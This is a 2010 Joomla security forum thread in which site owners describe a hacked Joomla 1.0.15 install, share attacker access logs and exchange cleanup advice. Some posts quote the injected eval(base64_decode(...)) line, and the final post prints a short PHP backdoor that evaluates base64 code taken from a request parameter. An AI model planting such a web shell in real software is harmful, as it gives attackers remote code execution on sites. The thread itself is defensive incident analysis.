Joomla 1.0.15 site being hacked and redirected

Discussion regarding Joomla! security issues.

Moderator: General Support Moderators

Forum rules
Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting, this means YOU.
Security Checklist
Forum Post Assistant - If you are serious about wanting help, you will use this tool to help you post.
Locked
qqwwong
Joomla! Apprentice
Joomla! Apprentice
Posts: 22
Joined: Mon Apr 03, 2006 9:08 am
Location: Hong Kong

Joomla 1.0.15 site being hacked and redirected

Post by qqwwong » Mon Sep 27, 2010 4:00 am

I have a Joomla 1.0.15 site. It was hacked. When it is accessed, it is redirected to a suspicious site. When I looked at the source of my site, I found all the php files had been changed. A piece of suspicious code was added to the beginning of every php file. It looks like

Code: Select all

<?php /**/ eval(base64_decode(".........."));?>
Does anyone has any cue how this happens?

Thanks in advance.

Wai

User avatar
mark_up
Joomla! Guru
Joomla! Guru
Posts: 849
Joined: Sun Oct 29, 2006 10:51 am
Location: Fiji
Contact:

Re: Joomla 1.0.15 site being hacked and redirected

Post by mark_up » Mon Sep 27, 2010 4:30 am

Hi qqwwong,

Your website could have been hacked in a number of different ways ie. there is nothing in the information you have provided that hints at any particular exploit.

It may be that an extension installed on your website had a vulnerability that was exploited, or maybe your host hasn't properly secured their server. Maybe the computer you use was infected with malware that grabbed your password from somewhere you stored it (an FTP client perhaps?), or maybe as you typed it in (a keylogger). Maybe the network you accessed your site from was compromised and the passwords simply pulled off the wire (they are sent in plain text if you don't use SSL for your admin).

Basically, there are numerous ways a website can be compromised.

I would suggest wiping your server clean... ie. remove all files and databases, and reinstall from a clean backup. Change all your FTP, cpanel, and Joomla passwords.

I would also consider migrating to Joomla 1.5 since I doubt the extensions you use on your website are still being actively maintained and patched.

I'm sorry this happened to you; I know how it feels. That said, I can offer nothing more than the old advice, "backup! backup! backup!. Hopefully you already knew that and have a good backup you can restore from.

Good luck!
-Mark
http://twitter.com/mark_up.
Opinions expressed are mine alone and don't necessarily represent the views of any organisation I am associated with.

biirc
Joomla! Enthusiast
Joomla! Enthusiast
Posts: 145
Joined: Thu Mar 12, 2009 11:34 am

Re: Joomla 1.0.15 site being hacked and redirected

Post by biirc » Thu Sep 30, 2010 2:01 pm

Hi,

we have the same problem on a site in joomla 1.0.15

a russian guy have the same problem too.

http://joomlaforum.ru/index.php?topic=131149.0

with a password (htpasswd) on the administrator site it will block the attack

on my site i have (web log)

81.180.71.42 xxxxxxxxxxxxxxxxxxx - [13/Sep/2010:14:41:25 +0200] "GET /administrator/index.php HTTP/1.1" 200 992 "-" "Opera/9.51 (Windows NT 5.1; U; en)"
81.180.71.42 xxxxxxxxxxxxxxxxxxx - [13/Sep/2010:14:41:26 +0200] "POST /administrator/index.php HTTP/1.1" 200 69 "-" "Opera/9.51 (Windows NT 5.1; U; en)"
81.180.71.42 xxxxxxxxxxxxxxxxxxx - [13/Sep/2010:14:41:27 +0200] "GET /administrator/index2.php?option=com_installer&element=mambot HTTP/1.1" 200 6896 "-" "Opera/9.51 (Windows NT 5.1; U; en)"
81.180.71.42 xxxxxxxxxxxxxxxxxxx - [13/Sep/2010:14:41:29 +0200] "POST /administrator/index2.php HTTP/1.1" 200 4689 "-" "Opera/9.51 (Windows NT 5.1; U; en)"
81.180.71.42 xxxxxxxxxxxxxxxxxxx - [13/Sep/2010:14:41:30 +0200] "GET /administrator/index2.php?option=com_installer&element=mambot HTTP/1.1" 200 6938 "-" "Opera/9.51 (Windows NT 5.1; U; en)"
81.180.71.42 xxxxxxxxxxxxxxxxxxx - [13/Sep/2010:14:41:31 +0200] "POST /mambots/system/loginJ00mla.php HTTP/1.1" 200 36 "-" "Opera/9.51 (Windows NT 5.1; U; en)"
81.180.71.42 xxxxxxxxxxxxxxxxxxx - [13/Sep/2010:14:41:32 +0200] "POST /administrator/index2.php HTTP/1.1" 301 20 "-" "Opera/9.51 (Windows NT 5.1; U; en)"
81.180.71.42 xxxxxxxxxxxxxxxxxxx - [13/Sep/2010:14:41:32 +0200] "GET /administrator/index2.php?option=com_installer&element=mambot&mosmsg=SUCCES+ HTTP/1.1" 200 6893 "-" "Opera/9.51 (Windows NT 5.1; U; en)"

But i have no log on the ftp side.

I don't know how the put this : /mambots/system/loginJ00mla.php

Stéphane

qqwwong
Joomla! Apprentice
Joomla! Apprentice
Posts: 22
Joined: Mon Apr 03, 2006 9:08 am
Location: Hong Kong

Re: Joomla 1.0.15 site being hacked and redirected

Post by qqwwong » Sat Oct 02, 2010 1:49 pm

biirc wrote:Hi,

we have the same problem on a site in joomla 1.0.15

a russian guy have the same problem too.

http://joomlaforum.ru/index.php?topic=131149.0

with a password (htpasswd) on the administrator site it will block the attack

on my site i have (web log)

81.180.71.42 xxxxxxxxxxxxxxxxxxx - [13/Sep/2010:14:41:25 +0200] "GET /administrator/index.php HTTP/1.1" 200 992 "-" "Opera/9.51 (Windows NT 5.1; U; en)"
81.180.71.42 xxxxxxxxxxxxxxxxxxx - [13/Sep/2010:14:41:26 +0200] "POST /administrator/index.php HTTP/1.1" 200 69 "-" "Opera/9.51 (Windows NT 5.1; U; en)"
81.180.71.42 xxxxxxxxxxxxxxxxxxx - [13/Sep/2010:14:41:27 +0200] "GET /administrator/index2.php?option=com_installer&element=mambot HTTP/1.1" 200 6896 "-" "Opera/9.51 (Windows NT 5.1; U; en)"
81.180.71.42 xxxxxxxxxxxxxxxxxxx - [13/Sep/2010:14:41:29 +0200] "POST /administrator/index2.php HTTP/1.1" 200 4689 "-" "Opera/9.51 (Windows NT 5.1; U; en)"
81.180.71.42 xxxxxxxxxxxxxxxxxxx - [13/Sep/2010:14:41:30 +0200] "GET /administrator/index2.php?option=com_installer&element=mambot HTTP/1.1" 200 6938 "-" "Opera/9.51 (Windows NT 5.1; U; en)"
81.180.71.42 xxxxxxxxxxxxxxxxxxx - [13/Sep/2010:14:41:31 +0200] "POST /mambots/system/loginJ00mla.php HTTP/1.1" 200 36 "-" "Opera/9.51 (Windows NT 5.1; U; en)"
81.180.71.42 xxxxxxxxxxxxxxxxxxx - [13/Sep/2010:14:41:32 +0200] "POST /administrator/index2.php HTTP/1.1" 301 20 "-" "Opera/9.51 (Windows NT 5.1; U; en)"
81.180.71.42 xxxxxxxxxxxxxxxxxxx - [13/Sep/2010:14:41:32 +0200] "GET /administrator/index2.php?option=com_installer&element=mambot&mosmsg=SUCCES+ HTTP/1.1" 200 6893 "-" "Opera/9.51 (Windows NT 5.1; U; en)"

But i have no log on the ftp side.

I don't know how the put this : /mambots/system/loginJ00mla.php

Stéphane
Hi, Stéphane,

Thank you for your message. I had exactly the same problem, and found the strange file "loginJ00mla.php". I found the timestamp of this file is different from the timestamp on all other php files that had been modified. I'm still no able to figure out how the file was injected into the system. I already added a passwd to protect the admin back-end page.

Wai

User avatar
mark_up
Joomla! Guru
Joomla! Guru
Posts: 849
Joined: Sun Oct 29, 2006 10:51 am
Location: Fiji
Contact:

Re: Joomla 1.0.15 site being hacked and redirected

Post by mark_up » Sat Oct 02, 2010 2:31 pm

Have you checked the extensions on your site against the Joomla Vulnerable Extensions list? Maybe you have a vulnerable extension installed.
http://twitter.com/mark_up.
Opinions expressed are mine alone and don't necessarily represent the views of any organisation I am associated with.

User avatar
mandville
Joomla! Master
Joomla! Master
Posts: 15152
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: Joomla 1.0.15 site being hacked and redirected

Post by mandville » Sat Oct 02, 2010 2:54 pm

apart from the extensions, i would also check the folder permissions, i do notice the mambot phrase which indicates its a very old system, perhaps you are using mambo extensions or even mambo itself!

run through this checklist and perhaps provide information on your installs eg joomla 1.0.13 etc

[ ] Run the forum post assistant and security tool Instructions available here

[ ] Ensure you have the latest version of Joomla. Delete all files in your Joomla installation. Replace the deleted files with fresh copies of a current full version of Joomla, and fresh copies of extensions and templates used. Only by replacing all files in the installation (including extensions and templates) can you be sure to remove the backdoors inserted and hidden in files and directories

[ ] Review Vulnerable Extensions List

[ ] Review and action Security Checklist checklist 7 to make sure you've gone through all of the steps.

[ ] Change all passwords and if possible user names for the website host control panel and your Joomla site.

[ ] Use proper permissions on files and directories. They should never be 777, but ideal is 644 and 755

[ ] Check your htaccess for for any odd code (i.e. code which is not in the standard htaccess supplied as part of the Joomla installation).

[ ] Check the crontab or Task Scheduler for unexpected jobs/tasks.

If you feel none of the above applies to you read these admin tips and the what went wrong post
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}

VegardAa
Joomla! Intern
Joomla! Intern
Posts: 89
Joined: Wed Oct 28, 2009 12:14 pm

Re: Joomla 1.0.15 site being hacked and redirected

Post by VegardAa » Mon Oct 04, 2010 10:28 am

Hello! We had the same problem. We think we found the point of entry -> com_mtree. Do you have that component installed? If so I would recommend upgrading it.

qqwwong
Joomla! Apprentice
Joomla! Apprentice
Posts: 22
Joined: Mon Apr 03, 2006 9:08 am
Location: Hong Kong

Re: Joomla 1.0.15 site being hacked and redirected

Post by qqwwong » Mon Oct 04, 2010 3:26 pm

VegardAa wrote:Hello! We had the same problem. We think we found the point of entry -> com_mtree. Do you have that component installed? If so I would recommend upgrading it.
Thank you for all your replies. I don't have this particular component installed. I'm now checking the extensions of the site against the Vulnerable Extensions List.
I had such an old version of Joomla because my client was unwilling to upgrade because the site worked for them. This time, they are convinced to upgrade to 1.5.x. Hope that can be done as soon as possible. Meanwhile, I have use .htaccess password to protect the administrator page.

User avatar
mandville
Joomla! Master
Joomla! Master
Posts: 15152
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: Joomla 1.0.15 site being hacked and redirected

Post by mandville » Mon Oct 04, 2010 7:22 pm

please note - most of the VEL entries are 1.5x only BUT some may work or be beased on those for 1.0.x.
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}

biirc
Joomla! Enthusiast
Joomla! Enthusiast
Posts: 145
Joined: Thu Mar 12, 2009 11:34 am

Re: Joomla 1.0.15 site being hacked and redirected

Post by biirc » Tue Oct 05, 2010 1:42 pm

Hi,

This is the list of the components, modules and mambots we have

Components :
- GMAccess
- JCal Pro
- JCE Admin
- JooMap
- JPortfolio
- Mambotheme Groups
- ReMOSitory
- Sigsiu Online Business Index 2

Modules :
- mod_jcalpro_latest

Mambots :
- Easy eXtended Gallery
- MOS Document
- MosModule
- Multithumb
- Simple Image Gallery Plugin
- XTypo
- Searchbot for Sigsiu Online Business Index 2
- JCE Utilities 1.5.0

I don't know how how the file was injected into the system, i didn't see any attack on the components.
Stéphane

User avatar
mandville
Joomla! Master
Joomla! Master
Posts: 15152
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: Joomla 1.0.15 site being hacked and redirected

Post by mandville » Tue Oct 05, 2010 1:57 pm

the fact that you are using mambots clearly indicates that you are using out of date and possibly vulnerable extensions.
i would consider migrating to j1.5 or contact each of the developers and ask for the latest j1.0 version, if you are using j1.0.x
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}

biirc
Joomla! Enthusiast
Joomla! Enthusiast
Posts: 145
Joined: Thu Mar 12, 2009 11:34 am

Re: Joomla 1.0.15 site being hacked and redirected

Post by biirc » Tue Oct 05, 2010 2:34 pm

Hi, thanks for your answer
we are in the Joomla! 1.0 » Security - 1.0.x - i know they are vulnerability.
This client call me because they have problem
This site use gmacess i will wait for joomla 1.6 for the upgrade.

I want just block the attack but i didn't see any attack on the components or manbots in the log.

81.180.71.42 xxxxxxxxxxxxxxxxxxx - [13/Sep/2010:14:41:31 +0200] "POST /mambots/system/loginJ00mla.php

This is not normal, they install a mambot and uninstall it after. how ?



Stéphane

qqwwong
Joomla! Apprentice
Joomla! Apprentice
Posts: 22
Joined: Mon Apr 03, 2006 9:08 am
Location: Hong Kong

Re: Joomla 1.0.15 site being hacked and redirected

Post by qqwwong » Wed Oct 06, 2010 12:41 pm

biirc wrote:Hi, thanks for your answer
we are in the Joomla! 1.0 » Security - 1.0.x - i know they are vulnerability.
This client call me because they have problem
This site use gmacess i will wait for joomla 1.6 for the upgrade.

I want just block the attack but i didn't see any attack on the components or manbots in the log.

81.180.71.42 xxxxxxxxxxxxxxxxxxx - [13/Sep/2010:14:41:31 +0200] "POST /mambots/system/loginJ00mla.php

This is not normal, they install a mambot and uninstall it after. how ?



Stéphane
This is certainly not normal. The system should not have this particular php file. When they POST to this file, they are sending something to your system, and this loginJ00mla.php is receiving the posted data, and possibly capturing username and password. This means that there is another way that the hacker installed this file before the time shown in this log entry.

I got exactly the same log entry (different time). I am not able to find out how this php file was installed yet.

biirc
Joomla! Enthusiast
Joomla! Enthusiast
Posts: 145
Joined: Thu Mar 12, 2009 11:34 am

Re: Joomla 1.0.15 site being hacked and redirected

Post by biirc » Wed Oct 06, 2010 1:41 pm

I qqwwong,

I know it's not normal but i have the same problem
I am not able to find out how this php file was installed yet.

Nothing in the http log and the ftp log , still searching

Stéphane

User avatar
mandville
Joomla! Master
Joomla! Master
Posts: 15152
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: Joomla 1.0.15 site being hacked and redirected

Post by mandville » Wed Oct 06, 2010 2:24 pm

biirc wrote:I qqwwong,
Nothing in the http log and the ftp log , still searching
Stéphane
can i suggest you loko around your hosts forums and see if anyone else has been hit by this... possibly its a jailshell break..
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}

biirc
Joomla! Enthusiast
Joomla! Enthusiast
Posts: 145
Joined: Thu Mar 12, 2009 11:34 am

Re: Joomla 1.0.15 site being hacked and redirected

Post by biirc » Thu Feb 17, 2011 4:55 pm

Hi,
The site of my clients was attacked, but it's seem that le last time they put a back door.

A file on mambots/pluging/login.php
defined( 'INFO_MODULES' ) or die( 'Restricted access.' );

with this function :
function jpimport($e)
{
if (!isset($_REQUEST['e'])) die( 'Restricted access' );
else eval(base64_decode($_REQUEST['e']));
}

qqwwong can you see this file too on your server , is it on your backup file ?

Stéphane.


Locked

Return to “Security - 1.0.x”